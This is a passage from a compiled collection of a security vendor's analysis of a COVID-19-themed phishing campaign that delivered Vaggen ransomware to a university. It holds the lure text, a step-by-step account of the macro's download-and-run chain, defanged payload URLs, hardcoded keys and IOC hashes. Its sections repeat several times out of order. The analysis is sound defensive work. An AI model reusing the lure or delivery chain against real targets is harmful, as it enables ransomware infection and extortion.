understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 784 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 785 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 786 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 787 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 788 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 789 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 790 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 791 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 792 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 793 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 794 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 795 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 796 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 797 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 798 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 799 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 800 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 801 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 802 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 803 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 804 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 805 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 806 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 807 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 808 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 809 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 810 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 811 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 812 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 813 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 814 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 815 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 816 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 817 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 818 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 819 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 820 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 821 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well 